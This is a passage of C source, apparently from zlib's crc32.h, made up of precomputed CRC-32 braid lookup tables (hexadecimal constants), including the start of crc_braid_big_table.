0xbefed481, 0x33762963, 0x7e9e2904, 0xf316d4e6, 0xe54e29ca, 0x68c6d428, 0x252ed44f, 0xa8a629ad, 0x099f2e17, 0x8417d3f5, 0xc9ffd392, 0x44772e70, 0x522fd35c, 0xdfa72ebe, 0x924f2ed9, 0x1fc7d33b, 0xadc088af, 0x2048754d, 0x6da0752a, 0xe02888c8, 0xf67075e4, 0x7bf88806, 0x36108861, 0xbb987583, 0x1aa17239, 0x97298fdb, 0xdac18fbc, 0x5749725e, 0x41118f72, 0xcc997290, 0x817172f7, 0x0cf98f15, 0x18727bc2, 0x95fa8620, 0xd8128647, 0x559a7ba5, 0x43c28689, 0xce4a7b6b, 0x83a27b0c, 0x0e2a86ee, 0xaf138154, 0x229b7cb6, 0x6f737cd1, 0xe2fb8133, 0xf4a37c1f, 0x792b81fd, 0x34c3819a, 0xb94b7c78, 0x1dd46834, 0x905c95d6, 0xddb495b1, 0x503c6853, 0x4664957f, 0xcbec689d, 0x860468fa, 0x0b8c9518, 0xaab592a2, 0x273d6f40, 0x6ad56f27, 0xe75d92c5, 0xf1056fe9, 0x7c8d920b, 0x3165926c, 0xbced6f8e, 0xa8669b59, 0x25ee66bb, 0x680666dc, 0xe58e9b3e, 0xf3d66612, 0x7e5e9bf0, 0x33b69b97, 0xbe3e6675, 0x1f0761cf, 0x928f9c2d, 0xdf679c4a, 0x52ef61a8, 0x44b79c84, 0xc93f6166, 0x84d76101, 0x095f9ce3, 0x16984fd8, 0x9b10b23a, 0xd6f8b25d, 0x5b704fbf, 0x4d28b293, 0xc0a04f71, 0x8d484f16, 0x00c0b2f4, 0xa1f9b54e, 0x2c7148ac, 0x619948cb, 0xec11b529, 0xfa494805, 0x77c1b5e7, 0x3a29b580, 0xb7a14862, 0xa32abcb5, 0x2ea24157, 0x634a4130, 0xeec2bcd2, 0xf89a41fe, 0x7512bc1c, 0x38fabc7b, 0xb5724199, 0x144b4623, 0x99c3bbc1, 0xd42bbba6, 0x59a34644, 0x4ffbbb68, 0xc273468a, 0x8f9b46ed, 0x0213bb0f, 0xa68caf43, 0x2b0452a1, 0x66ec52c6, 0xeb64af24, 0xfd3c5208, 0x70b4afea, 0x3d5caf8d, 0xb0d4526f, 0x11ed55d5, 0x9c65a837, 0xd18da850, 0x5c0555b2, 0x4a5da89e, 0xc7d5557c, 0x8a3d551b, 0x07b5a8f9, 0x133e5c2e, 0x9eb6a1cc, 0xd35ea1ab, 0x5ed65c49, 0x488ea165, 0xc5065c87, 0x88ee5ce0, 0x0566a102, 0xa45fa6b8, 0x29d75b5a, 0x643f5b3d, 0xe9b7a6df, 0xffef5bf3, 0x7267a611, 0x3f8fa676, 0xb2075b94}, {0x00000000, 0x80f0171f, 0xda91287f, 0x5a613f60, 0x6e5356bf, 0xeea341a0, 0xb4c27ec0, 0x343269df, 0xdca6ad7e, 0x5c56ba61, 0x06378501, 0x86c7921e, 0xb2f5fbc1, 0x3205ecde, 0x6864d3be, 0xe894c4a1, 0x623c5cbd, 0xe2cc4ba2, 0xb8ad74c2, 0x385d63dd, 0x0c6f0a02, 0x8c9f1d1d, 0xd6fe227d, 0x560e3562, 0xbe9af1c3, 0x3e6ae6dc, 0x640bd9bc, 0xe4fbcea3, 0xd0c9a77c, 0x5039b063, 0x0a588f03, 0x8aa8981c, 0xc478b97a, 0x4488ae65, 0x1ee99105, 0x9e19861a, 0xaa2befc5, 0x2adbf8da, 0x70bac7ba, 0xf04ad0a5, 0x18de1404, 0x982e031b, 0xc24f3c7b, 0x42bf2b64, 0x768d42bb, 0xf67d55a4, 0xac1c6ac4, 0x2cec7ddb, 0xa644e5c7, 0x26b4f2d8, 0x7cd5cdb8, 0xfc25daa7, 0xc817b378, 0x48e7a467, 0x12869b07, 0x92768c18, 0x7ae248b9, 0xfa125fa6, 0xa07360c6, 0x208377d9, 0x14b11e06, 0x94410919, 0xce203679, 0x4ed02166, 0x538074b5, 0xd37063aa, 0x89115cca, 0x09e14bd5, 0x3dd3220a, 0xbd233515, 0xe7420a75, 0x67b21d6a, 0x8f26d9cb, 0x0fd6ced4, 0x55b7f1b4, 0xd547e6ab, 0xe1758f74, 0x6185986b, 0x3be4a70b, 0xbb14b014, 0x31bc2808, 0xb14c3f17, 0xeb2d0077, 0x6bdd1768, 0x5fef7eb7, 0xdf1f69a8, 0x857e56c8, 0x058e41d7, 0xed1a8576, 0x6dea9269, 0x378bad09, 0xb77bba16, 0x8349d3c9, 0x03b9c4d6, 0x59d8fbb6, 0xd928eca9, 0x97f8cdcf, 0x1708dad0, 0x4d69e5b0, 0xcd99f2af, 0xf9ab9b70, 0x795b8c6f, 0x233ab30f, 0xa3caa410, 0x4b5e60b1, 0xcbae77ae, 0x91cf48ce, 0x113f5fd1, 0x250d360e, 0xa5fd2111, 0xff9c1e71, 0x7f6c096e, 0xf5c49172, 0x7534866d, 0x2f55b90d, 0xafa5ae12, 0x9b97c7cd, 0x1b67d0d2, 0x4106efb2, 0xc1f6f8ad, 0x29623c0c, 0xa9922b13, 0xf3f31473, 0x7303036c, 0x47316ab3, 0xc7c17dac, 0x9da042cc, 0x1d5055d3, 0xa700e96a, 0x27f0fe75, 0x7d91c115, 0xfd61d60a, 0xc953bfd5, 0x49a3a8ca, 0x13c297aa, 0x933280b5, 0x7ba64414, 0xfb56530b, 0xa1376c6b, 0x21c77b74, 0x15f512ab, 0x950505b4, 0xcf643ad4, 0x4f942dcb, 0xc53cb5d7, 0x45cca2c8, 0x1fad9da8, 0x9f5d8ab7, 0xab6fe368, 0x2b9ff477, 0x71fecb17, 0xf10edc08, 0x199a18a9, 0x996a0fb6, 0xc30b30d6, 0x43fb27c9, 0x77c94e16, 0xf7395909, 0xad586669, 0x2da87176, 0x63785010, 0xe388470f, 0xb9e9786f, 0x39196f70, 0x0d2b06af, 0x8ddb11b0, 0xd7ba2ed0, 0x574a39cf, 0xbfdefd6e, 0x3f2eea71, 0x654fd511, 0xe5bfc20e, 0xd18dabd1, 0x517dbcce, 0x0b1c83ae, 0x8bec94b1, 0x01440cad, 0x81b41bb2, 0xdbd524d2, 0x5b2533cd, 0x6f175a12, 0xefe74d0d, 0xb586726d, 0x35766572, 0xdde2a1d3, 0x5d12b6cc, 0x077389ac, 0x87839eb3, 0xb3b1f76c, 0x3341e073, 0x6920df13, 0xe9d0c80c, 0xf4809ddf, 0x74708ac0, 0x2e11b5a0, 0xaee1a2bf, 0x9ad3cb60, 0x1a23dc7f, 0x4042e31f, 0xc0b2f400, 0x282630a1, 0xa8d627be, 0xf2b718de, 0x72470fc1, 0x4675661e, 0xc6857101, 0x9ce44e61, 0x1c14597e, 0x96bcc162, 0x164cd67d, 0x4c2de91d, 0xccddfe02, 0xf8ef97dd, 0x781f80c2, 0x227ebfa2, 0xa28ea8bd, 0x4a1a6c1c, 0xcaea7b03, 0x908b4463, 0x107b537c, 0x24493aa3, 0xa4b92dbc, 0xfed812dc, 0x7e2805c3, 0x30f824a5, 0xb00833ba, 0xea690cda, 0x6a991bc5, 0x5eab721a, 0xde5b6505, 0x843a5a65, 0x04ca4d7a, 0xec5e89db, 0x6cae9ec4, 0x36cfa1a4, 0xb63fb6bb, 0x820ddf64, 0x02fdc87b, 0x589cf71b, 0xd86ce004, 0x52c47818, 0xd2346f07, 0x88555067, 0x08a54778, 0x3c972ea7, 0xbc6739b8, 0xe60606d8, 0x66f611c7, 0x8e62d566, 0x0e92c279, 0x54f3fd19, 0xd403ea06, 0xe03183d9, 0x60c194c6, 0x3aa0aba6, 0xba50bcb9}, {0x00000000, 0x9570d495, 0xf190af6b, 0x64e07bfe, 0x38505897, 0xad208c02, 0xc9c0f7fc, 0x5cb02369, 0x70a0b12e, 0xe5d065bb, 0x81301e45, 0x1440cad0, 0x48f0e9b9, 0xdd803d2c, 0xb96046d2, 0x2c109247, 0xe141625c, 0x7431b6c9, 0x10d1cd37, 0x85a119a2, 0xd9113acb, 0x4c61ee5e, 0x288195a0, 0xbdf14135, 0x91e1d372, 0x049107e7, 0x60717c19, 0xf501a88c, 0xa9b18be5, 0x3cc15f70, 0x5821248e, 0xcd51f01b, 0x19f3c2f9, 0x8c83166c, 0xe8636d92, 0x7d13b907, 0x21a39a6e, 0xb4d34efb, 0xd0333505, 0x4543e190, 0x695373d7, 0xfc23a742, 0x98c3dcbc, 0x0db30829, 0x51032b40, 0xc473ffd5, 0xa093842b, 0x35e350be, 0xf8b2a0a5, 0x6dc27430, 0x09220fce, 0x9c52db5b, 0xc0e2f832, 0x55922ca7, 0x31725759, 0xa40283cc, 0x8812118b, 0x1d62c51e, 0x7982bee0, 0xecf26a75, 0xb042491c, 0x25329d89, 0x41d2e677, 0xd4a232e2, 0x33e785f2, 0xa6975167, 0xc2772a99, 0x5707fe0c, 0x0bb7dd65, 0x9ec709f0, 0xfa27720e, 0x6f57a69b, 0x434734dc, 0xd637e049, 0xb2d79bb7, 0x27a74f22, 0x7b176c4b, 0xee67b8de, 0x8a87c320, 0x1ff717b5, 0xd2a6e7ae, 0x47d6333b, 0x233648c5, 0xb6469c50, 0xeaf6bf39, 0x7f866bac, 0x1b661052, 0x8e16c4c7, 0xa2065680, 0x37768215, 0x5396f9eb, 0xc6e62d7e, 0x9a560e17, 0x0f26da82, 0x6bc6a17c, 0xfeb675e9, 0x2a14470b, 0xbf64939e, 0xdb84e860, 0x4ef43cf5, 0x12441f9c, 0x8734cb09, 0xe3d4b0f7, 0x76a46462, 0x5ab4f625, 0xcfc422b0, 0xab24594e, 0x3e548ddb, 0x62e4aeb2, 0xf7947a27, 0x937401d9, 0x0604d54c, 0xcb552557, 0x5e25f1c2, 0x3ac58a3c, 0xafb55ea9, 0xf3057dc0, 0x6675a955, 0x0295d2ab, 0x97e5063e, 0xbbf59479, 0x2e8540ec, 0x4a653b12, 0xdf15ef87, 0x83a5ccee, 0x16d5187b, 0x72356385, 0xe745b710, 0x67cf0be4, 0xf2bfdf71, 0x965fa48f, 0x032f701a, 0x5f9f5373, 0xcaef87e6, 0xae0ffc18, 0x3b7f288d, 0x176fbaca, 0x821f6e5f, 0xe6ff15a1, 0x738fc134, 0x2f3fe25d, 0xba4f36c8, 0xdeaf4d36, 0x4bdf99a3, 0x868e69b8, 0x13febd2d, 0x771ec6d3, 0xe26e1246, 0xbede312f, 0x2baee5ba, 0x4f4e9e44, 0xda3e4ad1, 0xf62ed896, 0x635e0c03, 0x07be77fd, 0x92cea368, 0xce7e8001, 0x5b0e5494, 0x3fee2f6a, 0xaa9efbff, 0x7e3cc91d, 0xeb4c1d88, 0x8fac6676, 0x1adcb2e3, 0x466c918a, 0xd31c451f, 0xb7fc3ee1, 0x228cea74, 0x0e9c7833, 0x9becaca6, 0xff0cd758, 0x6a7c03cd, 0x36cc20a4, 0xa3bcf431, 0xc75c8fcf, 0x522c5b5a, 0x9f7dab41, 0x0a0d7fd4, 0x6eed042a, 0xfb9dd0bf, 0xa72df3d6, 0x325d2743, 0x56bd5cbd, 0xc3cd8828, 0xefdd1a6f, 0x7aadcefa, 0x1e4db504, 0x8b3d6191, 0xd78d42f8, 0x42fd966d, 0x261ded93, 0xb36d3906, 0x54288e16, 0xc1585a83, 0xa5b8217d, 0x30c8f5e8, 0x6c78d681, 0xf9080214, 0x9de879ea, 0x0898ad7f, 0x24883f38, 0xb1f8ebad, 0xd5189053, 0x406844c6, 0x1cd867af, 0x89a8b33a, 0xed48c8c4, 0x78381c51, 0xb569ec4a, 0x201938df, 0x44f94321, 0xd18997b4, 0x8d39b4dd, 0x18496048, 0x7ca91bb6, 0xe9d9cf23, 0xc5c95d64, 0x50b989f1, 0x3459f20f, 0xa129269a, 0xfd9905f3, 0x68e9d166, 0x0c09aa98, 0x99797e0d, 0x4ddb4cef, 0xd8ab987a, 0xbc4be384, 0x293b3711, 0x758b1478, 0xe0fbc0ed, 0x841bbb13, 0x116b6f86, 0x3d7bfdc1, 0xa80b2954, 0xcceb52aa, 0x599b863f, 0x052ba556, 0x905b71c3, 0xf4bb0a3d, 0x61cbdea8, 0xac9a2eb3, 0x39eafa26, 0x5d0a81d8, 0xc87a554d, 0x94ca7624, 0x01baa2b1, 0x655ad94f, 0xf02a0dda, 0xdc3a9f9d, 0x494a4b08, 0x2daa30f6, 0xb8dae463, 0xe46ac70a, 0x711a139f, 0x15fa6861, 0x808abcf4}, {0x00000000, 0xcf9e17c8, 0x444d29d1, 0x8bd33e19, 0x889a53a2, 0x4704446a, 0xccd77a73, 0x03496dbb, 0xca45a105, 0x05dbb6cd, 0x8e0888d4, 0x41969f1c, 0x42dff2a7, 0x8d41e56f, 0x0692db76, 0xc90cccbe, 0x4ffa444b, 0x80645383, 0x0bb76d9a, 0xc4297a52, 0xc76017e9, 0x08fe0021, 0x832d3e38, 0x4cb329f0, 0x85bfe54e, 0x4a21f286, 0xc1f2cc9f, 0x0e6cdb57, 0x0d25b6ec, 0xc2bba124, 0x49689f3d, 0x86f688f5, 0x9ff48896, 0x506a9f5e, 0xdbb9a147, 0x1427b68f, 0x176edb34, 0xd8f0ccfc, 0x5323f2e5, 0x9cbde52d, 0x55b12993, 0x9a2f3e5b, 0x11fc0042, 0xde62178a, 0xdd2b7a31, 0x12b56df9, 0x996653e0, 0x56f84428, 0xd00eccdd, 0x1f90db15, 0x9443e50c, 0x5bddf2c4, 0x58949f7f, 0x970a88b7, 0x1cd9b6ae, 0xd347a166, 0x1a4b6dd8, 0xd5d57a10, 0x5e064409, 0x919853c1, 0x92d13e7a, 0x5d4f29b2, 0xd69c17ab, 0x19020063, 0xe498176d, 0x2b0600a5, 0xa0d53ebc, 0x6f4b2974, 0x6c0244cf, 0xa39c5307, 0x284f6d1e, 0xe7d17ad6, 0x2eddb668, 0xe143a1a0, 0x6a909fb9, 0xa50e8871, 0xa647e5ca, 0x69d9f202, 0xe20acc1b, 0x2d94dbd3, 0xab625326, 0x64fc44ee, 0xef2f7af7, 0x20b16d3f, 0x23f80084, 0xec66174c, 0x67b52955, 0xa82b3e9d, 0x6127f223, 0xaeb9e5eb, 0x256adbf2, 0xeaf4cc3a, 0xe9bda181, 0x2623b649, 0xadf08850, 0x626e9f98, 0x7b6c9ffb, 0xb4f28833, 0x3f21b62a, 0xf0bfa1e2, 0xf3f6cc59, 0x3c68db91, 0xb7bbe588, 0x7825f240, 0xb1293efe, 0x7eb72936, 0xf564172f, 0x3afa00e7, 0x39b36d5c, 0xf62d7a94, 0x7dfe448d, 0xb2605345, 0x3496dbb0, 0xfb08cc78, 0x70dbf261, 0xbf45e5a9, 0xbc0c8812, 0x73929fda, 0xf841a1c3, 0x37dfb60b, 0xfed37ab5, 0x314d6d7d, 0xba9e5364, 0x750044ac, 0x76492917, 0xb9d73edf, 0x320400c6, 0xfd9a170e, 0x1241289b, 0xdddf3f53, 0x560c014a, 0x99921682, 0x9adb7b39, 0x55456cf1, 0xde9652e8, 0x11084520, 0xd804899e, 0x179a9e56, 0x9c49a04f, 0x53d7b787, 0x509eda3c, 0x9f00cdf4, 0x14d3f3ed, 0xdb4de425, 0x5dbb6cd0, 0x92257b18, 0x19f64501, 0xd66852c9, 0xd5213f72, 0x1abf28ba, 0x916c16a3, 0x5ef2016b, 0x97fecdd5, 0x5860da1d, 0xd3b3e404, 0x1c2df3cc, 0x1f649e77, 0xd0fa89bf, 0x5b29b7a6, 0x94b7a06e, 0x8db5a00d, 0x422bb7c5, 0xc9f889dc, 0x06669e14, 0x052ff3af, 0xcab1e467, 0x4162da7e, 0x8efccdb6, 0x47f00108, 0x886e16c0, 0x03bd28d9, 0xcc233f11, 0xcf6a52aa, 0x00f44562, 0x8b277b7b, 0x44b96cb3, 0xc24fe446, 0x0dd1f38e, 0x8602cd97, 0x499cda5f, 0x4ad5b7e4, 0x854ba02c, 0x0e989e35, 0xc10689fd, 0x080a4543, 0xc794528b, 0x4c476c92, 0x83d97b5a, 0x809016e1, 0x4f0e0129, 0xc4dd3f30, 0x0b4328f8, 0xf6d93ff6, 0x3947283e, 0xb2941627, 0x7d0a01ef, 0x7e436c54, 0xb1dd7b9c, 0x3a0e4585, 0xf590524d, 0x3c9c9ef3, 0xf302893b, 0x78d1b722, 0xb74fa0ea, 0xb406cd51, 0x7b98da99, 0xf04be480, 0x3fd5f348, 0xb9237bbd, 0x76bd6c75, 0xfd6e526c, 0x32f045a4, 0x31b9281f, 0xfe273fd7, 0x75f401ce, 0xba6a1606, 0x7366dab8, 0xbcf8cd70, 0x372bf369, 0xf8b5e4a1, 0xfbfc891a, 0x34629ed2, 0xbfb1a0cb, 0x702fb703, 0x692db760, 0xa6b3a0a8, 0x2d609eb1, 0xe2fe8979, 0xe1b7e4c2, 0x2e29f30a, 0xa5facd13, 0x6a64dadb, 0xa3681665, 0x6cf601ad, 0xe7253fb4, 0x28bb287c, 0x2bf245c7, 0xe46c520f, 0x6fbf6c16, 0xa0217bde, 0x26d7f32b, 0xe949e4e3, 0x629adafa, 0xad04cd32, 0xae4da089, 0x61d3b741, 0xea008958, 0x259e9e90, 0xec92522e, 0x230c45e6, 0xa8df7bff, 0x67416c37, 0x6408018c, 0xab961644, 0x2045285d, 0xefdb3f95}, {0x00000000, 0x24825136, 0x4904a26c, 0x6d86f35a, 0x920944d8, 0xb68b15ee, 0xdb0de6b4, 0xff8fb782, 0xff638ff1, 0xdbe1dec7, 0xb6672d9d, 0x92e57cab, 0x6d6acb29, 0x49e89a1f, 0x246e6945, 0x00ec3873, 0x25b619a3, 0x01344895, 0x6cb2bbcf, 0x4830eaf9, 0xb7bf5d7b, 0x933d0c4d, 0xfebbff17, 0xda39ae21, 0xdad59652, 0xfe57c764, 0x93d1343e, 0xb7536508, 0x48dcd28a, 0x6c5e83bc, 0x01d870e6, 0x255a21d0, 0x4b6c3346, 0x6fee6270, 0x0268912a, 0x26eac01c, 0xd965779e, 0xfde726a8, 0x9061d5f2, 0xb4e384c4, 0xb40fbcb7, 0x908ded81, 0xfd0b1edb, 0xd9894fed, 0x2606f86f, 0x0284a959, 0x6f025a03, 0x4b800b35, 0x6eda2ae5, 0x4a587bd3, 0x27de8889, 0x035cd9bf, 0xfcd36e3d, 0xd8513f0b, 0xb5d7cc51, 0x91559d67, 0x91b9a514, 0xb53bf422, 0xd8bd0778, 0xfc3f564e, 0x03b0e1cc, 0x2732b0fa, 0x4ab443a0, 0x6e361296, 0x96d8668c, 0xb25a37ba, 0xdfdcc4e0, 0xfb5e95d6, 0x04d12254, 0x20537362, 0x4dd58038, 0x6957d10e, 0x69bbe97d, 0x4d39b84b, 0x20bf4b11, 0x043d1a27, 0xfbb2ada5, 0xdf30fc93, 0xb2b60fc9, 0x96345eff, 0xb36e7f2f, 0x97ec2e19, 0xfa6add43, 0xdee88c75, 0x21673bf7, 0x05e56ac1, 0x6863999b, 0x4ce1c8ad, 0x4c0df0de, 0x688fa1e8, 0x050952b2, 0x218b0384, 0xde04b406, 0xfa86e530, 0x9700166a, 0xb382475c, 0xddb455ca, 0xf93604fc, 0x94b0f7a6, 0xb032a690, 0x4fbd1112, 0x6b3f4024, 0x06b9b37e, 0x223be248, 0x22d7da3b, 0x06558b0d, 0x6bd37857, 0x4f512961, 0xb0de9ee3, 0x945ccfd5, 0xf9da3c8f, 0xdd586db9, 0xf8024c69, 0xdc801d5f, 0xb106ee05, 0x9584bf33, 0x6a0b08b1, 0x4e895987, 0x230faadd, 0x078dfbeb, 0x0761c398, 0x23e392ae, 0x4e6561f4, 0x6ae730c2, 0x95688740, 0xb1ead676, 0xdc6c252c, 0xf8ee741a, 0xf6c1cb59, 0xd2439a6f, 0xbfc56935, 0x9b473803, 0x64c88f81, 0x404adeb7, 0x2dcc2ded, 0x094e7cdb, 0x09a244a8, 0x2d20159e, 0x40a6e6c4, 0x6424b7f2, 0x9bab0070, 0xbf295146, 0xd2afa21c, 0xf62df32a, 0xd377d2fa, 0xf7f583cc, 0x9a737096, 0xbef121a0, 0x417e9622, 0x65fcc714, 0x087a344e, 0x2cf86578, 0x2c145d0b, 0x08960c3d, 0x6510ff67, 0x4192ae51, 0xbe1d19d3, 0x9a9f48e5, 0xf719bbbf, 0xd39bea89, 0xbdadf81f, 0x992fa929, 0xf4a95a73, 0xd02b0b45, 0x2fa4bcc7, 0x0b26edf1, 0x66a01eab, 0x42224f9d, 0x42ce77ee, 0x664c26d8, 0x0bcad582, 0x2f4884b4, 0xd0c73336, 0xf4456200, 0x99c3915a, 0xbd41c06c, 0x981be1bc, 0xbc99b08a, 0xd11f43d0, 0xf59d12e6, 0x0a12a564, 0x2e90f452, 0x43160708, 0x6794563e, 0x67786e4d, 0x43fa3f7b, 0x2e7ccc21, 0x0afe9d17, 0xf5712a95, 0xd1f37ba3, 0xbc7588f9, 0x98f7d9cf, 0x6019add5, 0x449bfce3, 0x291d0fb9, 0x0d9f5e8f, 0xf210e90d, 0xd692b83b, 0xbb144b61, 0x9f961a57, 0x9f7a2224, 0xbbf87312, 0xd67e8048, 0xf2fcd17e, 0x0d7366fc, 0x29f137ca, 0x4477c490, 0x60f595a6, 0x45afb476, 0x612de540, 0x0cab161a, 0x2829472c, 0xd7a6f0ae, 0xf324a198, 0x9ea252c2, 0xba2003f4, 0xbacc3b87, 0x9e4e6ab1, 0xf3c899eb, 0xd74ac8dd, 0x28c57f5f, 0x0c472e69, 0x61c1dd33, 0x45438c05, 0x2b759e93, 0x0ff7cfa5, 0x62713cff, 0x46f36dc9, 0xb97cda4b, 0x9dfe8b7d, 0xf0787827, 0xd4fa2911, 0xd4161162, 0xf0944054, 0x9d12b30e, 0xb990e238, 0x461f55ba, 0x629d048c, 0x0f1bf7d6, 0x2b99a6e0, 0x0ec38730, 0x2a41d606, 0x47c7255c, 0x6345746a, 0x9ccac3e8, 0xb84892de, 0xd5ce6184, 0xf14c30b2, 0xf1a008c1, 0xd52259f7, 0xb8a4aaad, 0x9c26fb9b, 0x63a94c19, 0x472b1d2f, 0x2aadee75, 0x0e2fbf43}, {0x00000000, 0x36f290f3, 0x6de521e6, 0x5b17b115, 0xdbca43cc, 0xed38d33f, 0xb62f622a, 0x80ddf2d9, 0x6ce581d9, 0x5a17112a, 0x0100a03f, 0x37f230cc, 0xb72fc215, 0x81dd52e6, 0xdacae3f3, 0xec387300, 0xd9cb03b2, 0xef399341, 0xb42e2254, 0x82dcb2a7, 0x0201407e, 0x34f3d08d, 0x6fe46198, 0x5916f16b, 0xb52e826b, 0x83dc1298, 0xd8cba38d, 0xee39337e, 0x6ee4c1a7, 0x58165154, 0x0301e041, 0x35f370b2, 0x68e70125, 0x5e1591d6, 0x050220c3, 0x33f0b030, 0xb32d42e9, 0x85dfd21a, 0xdec8630f, 0xe83af3fc, 0x040280fc, 0x32f0100f, 0x69e7a11a, 0x5f1531e9, 0xdfc8c330, 0xe93a53c3, 0xb22de2d6, 0x84df7225, 0xb12c0297, 0x87de9264, 0xdcc92371, 0xea3bb382, 0x6ae6415b, 0x5c14d1a8, 0x070360bd, 0x31f1f04e, 0xddc9834e, 0xeb3b13bd, 0xb02ca2a8, 0x86de325b, 0x0603c082, 0x30f15071, 0x6be6e164, 0x5d147197, 0xd1ce024a, 0xe73c92b9, 0xbc2b23ac, 0x8ad9b35f, 0x0a044186, 0x3cf6d175, 0x67e16060, 0x5113f093, 0xbd2b8393, 0x8bd91360, 0xd0cea275, 0xe63c3286, 0x66e1c05f, 0x501350ac, 0x0b04e1b9, 0x3df6714a, 0x080501f8, 0x3ef7910b, 0x65e0201e, 0x5312b0ed, 0xd3cf4234, 0xe53dd2c7, 0xbe2a63d2, 0x88d8f321, 0x64e08021, 0x521210d2, 0x0905a1c7, 0x3ff73134, 0xbf2ac3ed, 0x89d8531e, 0xd2cfe20b, 0xe43d72f8, 0xb929036f, 0x8fdb939c, 0xd4cc2289, 0xe23eb27a, 0x62e340a3, 0x5411d050, 0x0f066145, 0x39f4f1b6, 0xd5cc82b6, 0xe33e1245, 0xb829a350, 0x8edb33a3, 0x0e06c17a, 0x38f45189, 0x63e3e09c, 0x5511706f, 0x60e200dd, 0x5610902e, 0x0d07213b, 0x3bf5b1c8, 0xbb284311, 0x8ddad3e2, 0xd6cd62f7, 0xe03ff204, 0x0c078104, 0x3af511f7, 0x61e2a0e2, 0x57103011, 0xd7cdc2c8, 0xe13f523b, 0xba28e32e, 0x8cda73dd, 0x78ed02d5, 0x4e1f9226, 0x15082333, 0x23fab3c0, 0xa3274119, 0x95d5d1ea, 0xcec260ff, 0xf830f00c, 0x1408830c, 0x22fa13ff, 0x79eda2ea, 0x4f1f3219, 0xcfc2c0c0, 0xf9305033, 0xa227e126, 0x94d571d5, 0xa1260167, 0x97d49194, 0xccc32081, 0xfa31b072, 0x7aec42ab, 0x4c1ed258, 0x1709634d, 0x21fbf3be, 0xcdc380be, 0xfb31104d, 0xa026a158, 0x96d431ab, 0x1609c372, 0x20fb5381, 0x7bece294, 0x4d1e7267, 0x100a03f0, 0x26f89303, 0x7def2216, 0x4b1db2e5, 0xcbc0403c, 0xfd32d0cf, 0xa62561da, 0x90d7f129, 0x7cef8229, 0x4a1d12da, 0x110aa3cf, 0x27f8333c, 0xa725c1e5, 0x91d75116, 0xcac0e003, 0xfc3270f0, 0xc9c10042, 0xff3390b1, 0xa42421a4, 0x92d6b157, 0x120b438e, 0x24f9d37d, 0x7fee6268, 0x491cf29b, 0xa524819b, 0x93d61168, 0xc8c1a07d, 0xfe33308e, 0x7eeec257, 0x481c52a4, 0x130be3b1, 0x25f97342, 0xa923009f, 0x9fd1906c, 0xc4c62179, 0xf234b18a, 0x72e94353, 0x441bd3a0, 0x1f0c62b5, 0x29fef246, 0xc5c68146, 0xf33411b5, 0xa823a0a0, 0x9ed13053, 0x1e0cc28a, 0x28fe5279, 0x73e9e36c, 0x451b739f, 0x70e8032d, 0x461a93de, 0x1d0d22cb, 0x2bffb238, 0xab2240e1, 0x9dd0d012, 0xc6c76107, 0xf035f1f4, 0x1c0d82f4, 0x2aff1207, 0x71e8a312, 0x471a33e1, 0xc7c7c138, 0xf13551cb, 0xaa22e0de, 0x9cd0702d, 0xc1c401ba, 0xf7369149, 0xac21205c, 0x9ad3b0af, 0x1a0e4276, 0x2cfcd285, 0x77eb6390, 0x4119f363, 0xad218063, 0x9bd31090, 0xc0c4a185, 0xf6363176, 0x76ebc3af, 0x4019535c, 0x1b0ee249, 0x2dfc72ba, 0x180f0208, 0x2efd92fb, 0x75ea23ee, 0x4318b31d, 0xc3c541c4, 0xf537d137, 0xae206022, 0x98d2f0d1, 0x74ea83d1, 0x42181322, 0x190fa237, 0x2ffd32c4, 0xaf20c01d, 0x99d250ee, 0xc2c5e1fb, 0xf4377108}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x0000000000000000, 0xf390f23600000000, 0xe621e56d00000000, 0x15b1175b00000000, 0xcc43cadb00000000, 0x3fd338ed00000000, 0x2a622fb600000000, 0xd9f2dd8000000000, 0xd981e56c00000000, 0x2a11175a00000000, 0x3fa0000100000000, 0xcc30f23700000000, 0x15c22fb700000000, 0xe652dd8100000000, 0xf3e3cada00000000, 0x007338ec00000000, 0xb203cbd900000000, 0x419339ef00000000, 0x54222eb400000000, 0xa7b2dc8200000000, 0x7e40010200000000, 0x8dd0f33400000000, 0x9861e46f00000000, 0x6bf1165900000000, 0x6b822eb500000000, 0x9812dc8300000000, 0x8da3cbd800000000, 0x7e3339ee00000000, 0xa7c1e46e00000000, 0x5451165800000000, 0x41e0010300000000, 0xb270f33500000000, 0x2501e76800000000, 0xd691155e00000000, 0xc320020500000000, 0x30b0f03300000000, 0xe9422db300000000, 0x1ad2df8500000000, 0x0f63c8de00000000, 0xfcf33ae800000000, 0xfc80020400000000, 0x0f10f03200000000, 0x1aa1e76900000000, 0xe931155f00000000, 0x30c3c8df00000000, 0xc3533ae900000000, 0xd6e22db200000000, 0x2572df8400000000, 0x97022cb100000000, 0x6492de8700000000, 0x7123c9dc00000000, 0x82b33bea00000000, 0x5b41e66a00000000, 0xa8d1145c00000000, 0xbd60030700000000, 0x4ef0f13100000000, 0x4e83c9dd00000000, 0xbd133beb00000000, 0xa8a22cb000000000, 0x5b32de8600000000, 0x82c0030600000000, 0x7150f13000000000, 0x64e1e66b00000000, 0x9771145d00000000, 0x4a02ced100000000, 0xb9923ce700000000, 0xac232bbc00000000, 0x5fb3d98a00000000, 0x8641040a00000000, 0x75d1f63c00000000, 0x6060e16700000000, 0x93f0135100000000, 0x93832bbd00000000, 0x6013d98b00000000, 0x75a2ced000000000, 0x86323ce600000000, 0x5fc0e16600000000, 0xac50135000000000, 0xb9e1040b00000000, 0x4a71f63d00000000, 0xf801050800000000, 0x0b91f73e00000000, 0x1e20e06500000000, 0xedb0125300000000, 0x3442cfd300000000, 0xc7d23de500000000, 0xd2632abe00000000, 0x21f3d88800000000, 0x2180e06400000000, 0xd210125200000000, 0xc7a1050900000000, 0x3431f73f00000000, 0xedc32abf00000000, 0x1e53d88900000000, 0x0be2cfd200000000, 0xf8723de400000000, 0x6f0329b900000000, 0x9c93db8f00000000, 0x8922ccd400000000, 0x7ab23ee200000000, 0xa340e36200000000, 0x50d0115400000000, 0x4561060f00000000, 0xb6f1f43900000000, 0xb682ccd500000000, 0x45123ee300000000, 0x50a329b800000000, 0xa333db8e00000000, 0x7ac1060e00000000, 0x8951f43800000000, 0x9ce0e36300000000, 0x6f70115500000000, 0xdd00e26000000000, 0x2e90105600000000, 0x3b21070d00000000, 0xc8b1f53b00000000, 0x114328bb00000000, 0xe2d3da8d00000000, 0xf762cdd600000000, 0x04f23fe000000000, 0x0481070c00000000, 0xf711f53a00000000, 0xe2a0e26100000000, 0x1130105700000000, 0xc8c2cdd700000000, 0x3b523fe100000000, 0x2ee328ba00000000, 0xdd73da8c00000000, 0xd502ed7800000000, 